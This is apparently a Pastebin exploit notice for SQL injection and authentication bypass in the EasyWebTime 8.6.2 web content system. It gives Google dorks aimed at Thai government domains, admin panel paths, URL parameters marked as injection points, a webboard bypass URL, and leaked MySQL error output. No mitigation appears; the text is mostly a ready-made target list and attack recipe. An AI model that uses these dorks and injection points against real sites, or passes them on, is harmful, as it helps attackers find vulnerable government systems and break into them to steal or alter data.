Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #############################################################
- # Exploit Title : BizPotential EasyWebTime 8.6.2 SQL Injection / Bypass
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 14/02/2019
- # Vendor Homepage : bizpotential.com ~ ewtadmin.com
- # Software Information Link : bizpotential.com/overview.php
- # Software Affected Version : 8.6.2 and all previous versions.
- # Software Price : 100$
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # CWE : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- CWE-592 - Authentication Bypass Issues
- # CXSecurity Reference Link : cxsecurity.com/ascii/WLB-2018090088
- #############################################################
- BizPotential EasyWebTime 8.6.2 Thailand Government SQL Injection Vulnerability
- #############################################################
- # Google Dorks :
- *****************
- inurl:''/ewtadmin/'' site:go.th
- inurl:''/main.php?filename='' site:go.th
- inurl:''/ewtadmin/ewt/ccs/''
- intext:''© Copyright 2007 - BizPotential.com - All Rights Reserved.''
- intext:''Copyright 2007 - BizPotential Co., Ltd. - All Rights Reserved''
- #############################################################
- # Admin Control Panel Paths :
- ***************************
- /ewtadmin/index.php
- /ewtadmin82/
- /ewtcommittee/index2331.php
- /ewtadmin/ewt/DOMAINNAMEHERE_intranet/ewt_login.php
- #############################################################
- # SQL Injection Exploit :
- ********************
- /n_more3.php?page=[ID-NUMBER]&c_id=[SQL Injection]
- /ewtadmin/ewt/[DOMAINNAME_web/n_more.php?c_id=[SQL Injection]
- /more_news.php?offset=[SQL Injection]
- /more_news.php?offset=-[ID-NUMBER]&cid=&startoffset=[SQL Injection]
- #############################################################
- # Webboard Exploit Bypass :
- **************************
- /ewtadmin/ewt/ccs/addquestion.php?wcad=5&t=1&filename=webboard
- # Webboard Directory Path :
- **************************
- /ewtadmin/ewt/ccs/index_question.php?wcad=5&t=1&filename=webboard
- /index_question.php?wcad=5&t=1&filename=webboard
- ccs.DOMAINNAME.go.th/index_question.php?wcad=5&t=1&filename=webboard
- #############################################################
- # Example SQL Database Errors =>
- ********************************
- SELECT * FROM article_list WHERE c_id = '199'' and n_approve = 'Y'
- ORDER BY n_date DESC LIMIT -20,20
- You have an error in your SQL syntax; check the manual that corresponds to your
- MySQL server version for the right syntax to use near '-20,20' at line 1
- SELECT * FROM article_list WHERE ( c_id = '' ) AND n_approve =
- 'Y' AND (('2561-09-10 05:57:13' between n_date_start and n_date_end)
- or (n_date_start = '' and n_date_end = '')) ORDER BY n_date
- DESC,n_timestamp DESC LIMIT 60\\\',20
- You have an error in your SQL syntax; check the manual that corresponds
- to your MySQL server version for the right syntax to use near '\\\',20' at line 1
- #############################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- #############################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement